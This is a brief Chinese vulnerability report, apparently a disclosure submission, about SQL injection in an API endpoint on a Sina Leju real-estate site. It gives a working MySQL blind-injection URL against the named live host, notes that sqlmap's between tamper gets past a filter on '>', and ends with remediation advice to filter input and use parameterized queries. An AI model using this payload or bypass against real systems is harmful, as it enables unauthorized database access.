新浪乐居某站SQL注入可绕过过滤

不唠叨了,直接贴payload,MySQL盲注。

https://house.leju.com/api/api.agent.php?key=634ea0d5da4600b5&module=month_kaipan_youhui&city=zhongshan' and 1=(case when 1=1 then 1 else (select 1 from information_schema.tables) end) and 'a'='a&return=jsonp&encode=utf-8&callback=_1461134370128102



直接丢SQLmap跑一下,>被过滤了,用between tamper可以绕过,不深挖了。

1.png



2.png



3.png

解决方案:

过滤,参数化查询